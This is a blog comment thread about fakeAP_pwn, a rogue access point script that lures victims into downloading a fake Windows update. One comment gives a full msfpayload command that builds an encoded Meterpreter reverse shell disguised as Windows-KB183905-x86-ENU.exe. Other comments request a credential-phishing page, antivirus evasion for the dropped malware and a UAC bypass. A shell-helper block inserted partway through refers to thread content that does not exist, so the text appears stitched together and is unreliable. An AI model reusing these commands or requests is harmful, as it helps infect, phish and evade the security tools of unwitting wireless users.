g0tm1lk, first of all I must say that your knowledge of BackTrack and Linux bash is extraordinary. I have only one thing, a small request; I don't think it will take you much time. Your script serves an update page with a payload, and I would be grateful if you could modify the script for me so that it doesn't serve a payload, just serves a login page. I have made the login page and all the other things, but I am learning bash and your code is too professional for me to modify, and since I respect your work I thought maybe I should ask for your permission. Thank you sir :)
ReplyDeleteFirst error is:
ReplyDelete"Couldn't test packet injection"
this is right afer it's configuring wireless card
adn then
"Scanning access point"
"Couldn't find the fake acces point.."
why is that ?
@everyone.
There are a lot of moving parts in this.
There are lots of different environments it has to work in too.
There is also a new version of backtrack out.
There are a "few" different versions of fakeAP_pwn - and the latest isn't the greatest (from what I remember).
It's been a while since I've worked on this.
I'm going to re-do it all one day, however not right now. For the people who are having trouble - I'm unable to give support right now - due to limited time. All I can say is try and do it manually else wait for fakeAP_pwn v0.4.
Will it be updated for BackTrack 5?
I tried to update it myself.
I'm stuck on the "Couldn't create exploit" error
Hi G0t. Congratulations on your fantastic work! I have a question about this tool. I'm running on BackTrack 5, when I start it, I've got two errors: First: "Can't detect the gateway" and the second (it will be a cause of the first) is "Failed: Couldn't create exploit". Can you help me to fix it? Thank you so much mate.
@ Above two: The "Cannot create exploit" error can be fixed by changing the metasploit reference in the script. I solved this using locate.
I use BT5 too and they do not use the default install path, I changed the references to look like this:
"
action "Metasploit (Windows)" "/opt/framework3/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP LPORT=4564 R | /opt/framework3/msf3/msfencode -x $www/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o $www/Windows-KB183905-x86-ENU.exe"
"
@Anyone who can help: I can get past that exploit creation part but I cannot seem to get my DHCPD3 up and running properly to use the script :(
Well I got it mostly up and running. My issue was a permissions issue I changed some directories and bingo!
I spotted what I bet is a typo in the iptables portion and fixed it: "liit" changed to "limit"
@g0tmi1k: This is beautiful thank you for teaching me so much about these tools and about bash in general.
@anyone: I have it running, I can see it from other devices, but nothing can establish the connection, any idea where I should start looking? I am using non mode if that helps (due to the fact right now I only have 1 wifi adapter)
Hi, I have the latest version of your script (#127)
The script executes fine until dhcp3.
Here's the error I get (with options -V -d):
[>] Starting: DHCP
Command: /etc/init.d/apparmor stop ; aa-complain dhcpd3 ; dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
[!] dhcpd3 failed to start
I can't figure out why it fails.
Hi people,
It's working for me in BackTrack 5, I post one image: http://i52.tinypic.com/a13dph.png
If you want to use fakeap_pwn in BT5, you should change PATH only, and DHCP problems are made by apparmor!
I have fakeap_pwn0.3 #127 working fully in my Backtrack5.
Various problems with metasploit:
"Failed to load extension: No response was received to the core_loadlib request"
I am downgrading to BT4r2, and I will try the script there. And then I'll tell you.
Cheers !
How did you get it to work with BT5? I get the DHCP error, or do you have a customized script? Thanks
On BT 4 it works! Good job! Many thanks
On BT 5:
[>] Starting: DHCP
[!] dhcpd3 failed to start
Please update to BT 5
Can you implement a bypass UAC exploit?!
@wMw
Yes - it will be updated for BackTrack 5 (when I find the time to).
Thanks for reporting that issue - I will look into it when the time comes.
Like the post above yours: "For the people which are having trouble - I'm unable to give support right now - due to limited time. All I can say is try and do it manually else wait for fakeAP_pwn v0.4."
@Gaia
Thanks for the thanks =)
It hasn't yet been made for BackTrack 5. I just haven't had the time.
I did explain this two posts above yours.
@PalverZ
Thanks for the fix, I will make a note of it =)
...and the DHCP and DNS have been an issue since the days of BackTrack 4 ;)
*I think I might of found a fix for fakeAP_Pwn v4*
@PalverZ (again)
Another fix! Cheers for that =)
Thanks for pointing out the typo.
You're welcome! Glad it's helped you
Regarding unable to connect - what WiFi device are you using? What driver? What is the target OS? How far away is the client to the AP?
@HDmovies
The latest isn't always the greatest - you can find older versions on the SVN.
There have been some reported fixes for DHCP in the comments above.
@dudu
I'm glad to see it has been working ;)
BackTrack 5 now comes with metasploit v4 - so the rc file which is generated might need to be updated.
@terrafaux
There have been possible fixes reported in the comments above
@Mark
I did explain this, 8 posts above yours....
"For the people which are having trouble - I'm unable to give support right now - due to limited time. All I can say is try and do it manually else wait for fakeAP_pwn v0.4."
@sorup
It's on the to-do list. However, if the machine is fully up-to-date it will still not work.
G0tm1lk, your script is the best I've ever seen! A big thanks for this!!
How can I replace the Windows-KB183905-x86-ENU.exe with a custom payload exe to try to bypass antivirus?
Thanks for the fantastic .sh. Thanks for everything, G0tm1lk...
My question is for DuDU. I'm on BT5, fighting for one week; all works fine... but not dhcp3...
Please, can you give us a solution?
@g0tmi1k I think sir all thanks belong to you lol....
I had been using a Broadcom card with brcm80211 generic drivers. I noticed that the AP window had no traffic.
So.... I bought an Alfa with RTL8187 Chipset and drivers, then I set back to work on it. I am able to connect to the Alfa but it gives the target "Limited or no connectivity" warning. However traffic shows up in the AP windows now. A step better than the last adapter.
Target: XP SP3. I have tried different distances.
I may have broken either DHCP or DNS with my "fix" I may have to try another method. It may be as mundane as MTU or channel settings.
I also haven't really messed around too much with it since BT5R1 Release maybe I'll find some time next week to see what I can come up with.
@Hizagashira
Thanks for the thanks.
Have a look in the options, you can tell it to use your own file. You'll need to edit the path/filename for it to use as well
@FranX
Thanks for the thanks.
It's not yet been updated for BackTrack 5. I'll try and update it when I get the time to!
@PalverZ
hehe! Cheers!
It's been a while since I've done it. What version are you using? What's the setup? What is the attacker running? VM install?
Hi g0tm1lk, your script is just... awesome! :) I've modified the script to make it work flawlessly with BackTrack 5 just by changing the paths. Here is the fixed version: http://www.mediafire.com/?dvxxe77gf75uj5e
@ptrac3
Thanks for the thanks!
Cheers for the work you have put in, I'll have a look at it when I get the time to! =)
Thanks for the thanks too! I adore your blog! :=)
Hi
Thank you very much g0tmi1k
I have a problem, the tool worked very nicely before, but now when I
run bash fakeAP_pwn.sh this error comes:
macchanger isn't installed
Would you like to try and install it? [Y/n]: y
When I answer y, it comes back with:
Failed to install macchanger
[i] Quiting
[>] Restoring: Environment
[*] Done! (= Have you... g0tmi1k?
Please please help me
When I click Yes, this comes up.
@ahmed.200007 Are you trying it on BT5? However, take a look at the modified script, it could work for you...
Thank you ptrac3
Yes, I try it in BT5.
I will try and I will come back.
@ptrac3
You're welcome! =)
Glad you like it so much
@ahmed.2000007
I haven't updated it yet to make it work with backtrack 5, I just haven't had the time.
Thanks ptrac3 and g0tmi1k for helping
Mr. ptrac3, I downloaded your modified script and the macchanger error is gone but another error comes:
Metasploit isn't installed.
[*] Would you like to try and install it? [Y/n]: y
[-] Failed to install metasploit
I used apt-get -y install metasploit
but again this error comes:
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Couldn't find package metasploit
Please help me if you can.
Mmm, are you trying it on BackTrack 5? The error above is a matter of paths. In fact the original script, for example to see if macchanger is installed, looks in /usr/bin/macchanger, but in BT5 the path is slightly changed because it is /usr/local/bin/macchanger. There are two options: you can make a symbolic link (e.g. /usr/local/bin/macchanger will point to /usr/bin/macchanger) or modify the script like I did. In the script I've just modified the default paths so the program can easily run on default installations of BT5. However, do an updatedb and then locate macchanger so we can see where you have installed macchanger.
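Two of the problems reported in this thread, the hardcoded /usr/bin paths that break on BT5 (the comment just above) and the connectivity check against whatismyip.org that no longer resolves (the comments near the top), are general shell-scripting problems. The following is an added example written for this page, not code from fakeAP_pwn or its author: it looks tools up through PATH with command -v instead of a fixed directory, and it tests connectivity against more than one endpoint with a timeout so a single dead site does not report the link as down. The endpoint URLs and the default wget flags are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example (not part of fakeAP_pwn): portable tool and connectivity checks.

# Resolve a tool through PATH instead of assuming /usr/bin or /usr/local/bin.
# Prints the full path and returns 0, or returns non-zero if not found.
tool_path() {
    command -v "$1" 2>/dev/null
}

# Check every tool named in the arguments; report the missing ones on
# stderr and return 1 if any is absent, 0 if all are present.
check_tools() {
    missing=""
    for t in "$@"; do
        if ! tool_path "$t" >/dev/null; then
            missing="$missing $t"
        fi
    done
    if [ -n "$missing" ]; then
        echo "[-] Missing:$missing" >&2
        return 1
    fi
    return 0
}

# Connectivity check: try several endpoints (assumed URLs, not from the
# page) with a per-request timeout, and succeed on the first that answers.
# The fetch command can be overridden with the first argument, which also
# makes the function testable without a network.
# Usage: check_internet            # uses wget with a 5 s timeout, 1 try
#        check_internet "curl -sf --max-time 5 -o /dev/null"
check_internet() {
    fetch="${1:-wget -q -O /dev/null -T 5 -t 1}"
    for url in http://www.debian.org/ http://www.kernel.org/; do
        if $fetch "$url" 2>/dev/null; then
            return 0
        fi
    done
    echo "[-] Internet access: Failed" >&2
    return 1
}
```

With these helpers a script can say `check_tools macchanger dhcpd3 apache2 || exit 1` and get one clear list of what is missing, whatever prefix the distribution installed the tools under.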
ptrac3, thanks, thanks very much. I did what you said and it works.
Thanks again for helping me.
@ahmed.2000007 @ptrac3
Glad to hear you guys have it working! =)
Hi, thanks so much. I like it but there is a big problem. When the victim downloads the update any antivirus can find the malware and delete it.
Can you fix it or prepare another way to make it work without the update?
@mamalhacker
I will on the next release. =)
Excellent script. I'm sure it runs flawless on Back|Track - though haven't tested it. Had to heavily modify the script (and my box) to get it to run on my Debian box without problem. All in all, very nicely done.
Also, dunno if you're aware, but the SVN version from googlecode is missing a few things to run properly.
Just wondering - have you ever thought of tailoring the script to run smoothly on Debian/Ubuntu/etc. and other distros? I'm willing to lend a helping hand to get this script to become more universal if you'd like.
@meebo
Thanks for the thanks!
Yes, I am. The SVN is more up-to-date, has more stuff (features and bugs).
I've just been too busy with other things to update/fix it.
Yes, I have. I was hoping to do so for the v0.4 release, however it's a lot more moving parts...
Hi g0tmi1k, please let us know when it will be ready for BT5R1
[*] fakeAP_pwn v0.3 (#101)
[>] Testing: Environment
[-] macchanger isn't installed.
[*] Would you like to try and install it? [Y/n]: ^C
Thank you for making this possible for all of us :)
We are waiting for v0.4
Cheers
@Witch Doctor
I'm hoping to start work on v0.4 during this summer.
Depends on how other projects go first.